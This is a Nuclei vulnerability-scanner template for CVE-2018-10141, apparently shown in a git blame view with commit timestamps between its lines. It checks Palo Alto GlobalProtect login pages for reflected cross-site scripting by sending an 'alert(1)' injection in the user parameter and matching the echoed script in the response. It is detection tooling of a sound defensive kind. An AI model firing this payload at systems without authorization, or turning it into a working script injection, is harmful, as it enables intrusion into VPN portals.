nuclei-templates/cves/2018/CVE-2018-10141.yaml

30 lines
758 B
YAML
Raw Normal View History

2021-05-03 09:46:08 +00:00
id: CVE-2018-10141
2021-05-02 19:26:49 +00:00
info:
2021-05-03 09:46:08 +00:00
name: GlobalProtect Login page XSS
2021-05-02 19:26:49 +00:00
author: dhiyaneshDk
2021-05-03 09:46:08 +00:00
description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML.
2021-05-02 19:26:49 +00:00
severity: medium
2021-05-03 09:46:08 +00:00
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141
tags: globalprotect,xss,cve,cve2018,vpn
2021-05-02 19:26:49 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
2021-05-03 09:46:08 +00:00
2021-05-02 19:26:49 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-05-03 09:46:08 +00:00
- 'var valueUser = "j";-alert(1)-"x";'
2021-05-02 19:26:49 +00:00
part: body
2021-05-03 09:46:08 +00:00
2021-05-02 19:26:49 +00:00
- type: word
words:
- "text/html"
part: header
2021-05-03 09:46:08 +00:00
2021-05-02 19:26:49 +00:00
- type: status
status:
2021-05-03 09:46:29 +00:00
- 200